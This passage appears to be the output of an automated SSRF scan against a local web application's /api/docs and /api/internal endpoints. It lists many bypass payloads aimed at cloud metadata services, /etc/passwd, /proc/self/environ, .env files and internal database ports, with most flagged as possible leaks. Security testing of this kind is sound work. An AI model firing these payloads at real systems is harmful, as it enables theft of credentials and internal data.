`http://localhost:4200/api/docs?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/docs?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/docs?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/docs?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/docs?url=0%2F` +- Testing: `http://localhost:4200/api/docs?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/docs?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/internal +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Flatest%2Fmeta-data%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A8080%2Fadmin` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A8080%2Fadmin` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fetc%2Fpasswd` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fetc%2Fpasswd` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Fadmin` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A3000%2Fadmin` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A3000%2Fconfig` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A3000%2Fconfig` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Fapi%2Finternal` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A3000%2Fapi%2Finternal` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Frails%2Finfo` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A3000%2Frails%2Finfo` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A3000%2Flogs` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A3000%2Flogs` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=mysql%3A%2F%2Flocalhost%3A3306%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=mysql%3A%2F%2Flocalhost%3A3306%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=redis%3A%2F%2Flocalhost%3A6379%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=redis%3A%2F%2Flocalhost%3A6379%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A9876%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A9876%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A54247%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A54247%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A59465%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A59465%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2F.git%2Fconfig` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2F.git%2Fconfig` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=169.254.169.254%2Fmetadata%2Finstance` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=169.254.169.254%2Fmetadata%2Finstance` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fdocs%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fdocs%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Finternal` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Finternal` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Flogs` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Flogs` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fconfig` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fconfig` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fauth_test` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fauth_test` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Foverseer_images` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Foverseer_images` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fcampuses` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fcampuses` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fcsv` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fcsv` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fprojects` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fprojects` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fsettings` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fsettings` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fstudents` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fstudents` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fsubmission` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fsubmission` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftasks` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftasks` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fteaching_periods` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fteaching_periods` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_actions` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_actions` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_eula` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_eula` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_hook` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftii_hook` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftutorials` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Ftutorials` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Funit_roles` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Funit_roles` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Funits` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Funits` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fusers` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2Fapi%2Fusers` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2F.env` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2F.env` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A4200%2F.git` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A4200%2F.git` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A443` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A443` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3A22` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3A22` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0.0.0.0%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0.0.0.0%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A25%2F%20SMTP` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A3128%2F%20Squid` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0000%3A%3A1%5D%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0000%3A%3A1%5D%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.127.127.127` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.127.127.127` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.1.3` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.1.3` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.0` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=2130706433` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=2130706433` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=017700000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=017700000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=google.com%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=google.com%40127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%23google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%23google.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=google.com.127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=google.com.127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=google.com%40127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=google.com%40127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%23google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%23google.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=google.com.127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=google.com.127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%3Fd%3Dgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=google.com%40localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=google.com%40localhost` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%23google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%23google.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=google.com.localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=google.com.localhost` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%2Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%2F%3Fd%3Dgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%2F%3Fd%3Dgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2500google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2500google.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2500google.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2500google.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%3Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%3Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2Fgoogle.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1%2F%2F%2Fgoogle.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localtest.me` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localtest.me` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=http%3A%400%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=http%3A%400%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=%5B%3A%3A%5D%3A80` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127%E3%80%820%E3%80%820%E3%80%821` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127%E3%80%820%E3%80%820%E3%80%821` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=2130706433%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=2130706433%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=3232235521%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=3232235521%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=3232235777%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=3232235777%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0177.0000.0000.0001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0177.0000.0000.0001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=00000177.00000000.00000000.00000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=00000177.00000000.00000000.00000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f000001%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f000001%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0xc0a80014%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0xc0a80014%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x7f.0x00.0x00.0x01` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x7f.0x00.0x00.0x01` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0x0000007f.0x00000000.0x00000000.0x00000001` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0x0000007f.0x00000000.0x00000000.0x00000001` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.000000000000.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.000000000000.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A%2B11211aaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A%2B11211aaa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost%3A00011211aaaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost%3A00011211aaaa` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localtest.me` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localtest.me` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=mail.ebc.apple.com` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=mail.ebc.apple.com` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.0.1.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=bugbounty.dod.network` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=bugbounty.dod.network` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=1ynrnhl.xip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=1ynrnhl.xip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=spoofed.burpcollaborator.net` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=spoofed.burpcollaborator.net` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=spoofed.burpcollaborator.net` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=spoofed.burpcollaborator.net` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.1.3` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.1.3` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=0` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=0` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=127.0.1` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=127.0.1` _(GET response leak)_ +- Testing: `http://localhost:4200/api/internal?url=localhost` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/api/internal?url=localhost` _(GET response leak)_ +- Testing: 